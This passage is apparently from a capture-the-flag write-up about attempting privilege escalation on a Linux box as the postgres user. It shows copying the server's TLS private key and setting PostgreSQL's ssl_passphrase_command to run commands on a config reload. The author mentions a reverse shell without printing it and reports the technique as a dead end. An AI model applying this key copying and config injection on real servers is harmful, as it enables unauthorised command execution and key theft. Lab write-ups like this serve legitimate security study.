ssl-cert


postgres@download:~$ id
uid=113(postgres) gid=118(postgres) groups=118(postgres),117(ssl-cert)

After moving laterally to the postgres account, I checked the group membership of the current user: it is a member of the ssl-cert group. This had already shown up much earlier, during the Initial Foothold phase.

postgres@download:~$ find / -group ssl-cert -ls 2>/dev/null
    55052      4 drwx--x---   2 root     ssl-cert     4096 jul 19 15:35 /etc/ssl/private

Searching the filesystem for anything owned by that group turned up a single directory, /etc/ssl/private. Interestingly, despite the root:ssl-cert ownership, the group only has the execute (traverse) bit on it, not read.

postgres@download:~$ cd /etc/ssl/private
postgres@download:/etc/ssl/private$ ll
ls: cannot open directory '.': Permission denied

So listing the directory contents is not possible either; files inside it can only be opened by name, which is exactly what the execute bit on a directory allows.

RCE via ssl-cert (failed)


An online resource describes an interesting approach to code execution that abuses membership of the ssl-cert group. Following through:

postgres@download:~$ cat /etc/postgresql/12/main/postgresql.conf | grep -i 'ssl_*'
# - SSL -
ssl = on
#ssl_ca_file = ''
ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'
#ssl_crl_file = ''
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
#ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL' # allowed SSL ciphers
#ssl_prefer_server_ciphers = on
#ssl_ecdh_curve = 'prime256v1'
#ssl_min_protocol_version = 'TLSv1'
#ssl_max_protocol_version = ''
#ssl_dh_params_file = ''
#ssl_passphrase_command = ''
#ssl_passphrase_command_supports_reload = off

This is the SSL section of postgresql.conf, which I had looked at earlier but skipped a few settings in.

postgres@download:~$ openssl rsa -aes256 -in /etc/ssl/private/ssl-cert-snakeoil.key -out ./ssl-cert-snakeoil.key
writing RSA key
Enter PEM pass phrase: passphrase
Verifying - Enter PEM pass phrase: passphrase
postgres@download:~$ mv ./ssl-cert-snakeoil.key /tmp/
postgres@download:~$ stat -Lc '%a %A' /tmp/ssl-cert-snakeoil.key 
600 -rw-------

I only need to export the existing key, /etc/ssl/private/ssl-cert-snakeoil.key, to a location I control. A passphrase has to be set during the export, and the exported copy must carry the permission bits PostgreSQL insists on for a key owned by the server user (0600, as the stat output confirms).

Now I only need to modify the SSL section of the configuration file, postgresql.conf.

The original settings are the ones in the grep output above; the changed version points ssl_key_file at the exported copy and puts a reverse shell command, followed by the passphrase, into the ssl_passphrase_command attribute.
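As an added illustration (not the post's own edit, and not code from the box), here is what the modified SSL section looks like, assuming postgresql.conf is writable by the postgres user as it was here. Instead of a reverse shell, the passphrase command records the identity it runs as into a file, so the outcome can be checked without a listener; the paths and the passphrase follow the post, the output file name /tmp/who.txt is an assumption.

```ini
# /etc/postgresql/12/main/postgresql.conf -- SSL section (added example)
#
# Original values on the box, for reference:
#   ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
#   #ssl_passphrase_command = ''
#   #ssl_passphrase_command_supports_reload = off

ssl = on
ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'

# Point the server at the passphrase-protected copy produced with
# openssl rsa -aes256; it must be mode 0600 and owned by postgres,
# otherwise the server refuses to load it.
ssl_key_file = '/tmp/ssl-cert-snakeoil.key'

# Runs whenever the server needs to unlock the key; its stdout is taken as
# the passphrase. Everything before the final echo executes with the
# privileges of the postmaster process. Here it writes uid/gid to
# /tmp/who.txt (assumed name) rather than spawning a reverse shell.
ssl_passphrase_command = 'id > /tmp/who.txt; echo passphrase'

# Without this, a configuration reload (SIGHUP / pg_reload_conf) will not
# re-read a passphrase-protected key, so the command would only fire on a
# full server restart.
ssl_passphrase_command_supports_reload = on
```

After saving the file, trigger the reload from psql with `SELECT pg_reload_conf();` and read /tmp/who.txt. The uid recorded there is the one the postmaster runs as, the same postgres user whose shell you already hold, which is the reason this path yields no privilege gain unless something running as root restarts or reloads the service.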

I waited on the other end for a shell, because I initially believed the root cron job would perform the reload for me. However, that never happens.

Although I can reload the configuration myself from within a psql session, I only get a shell back as the same user, which is expected: ssl_passphrase_command is executed by the postmaster, and that runs as the postgres OS user, not as root. This is a dead end.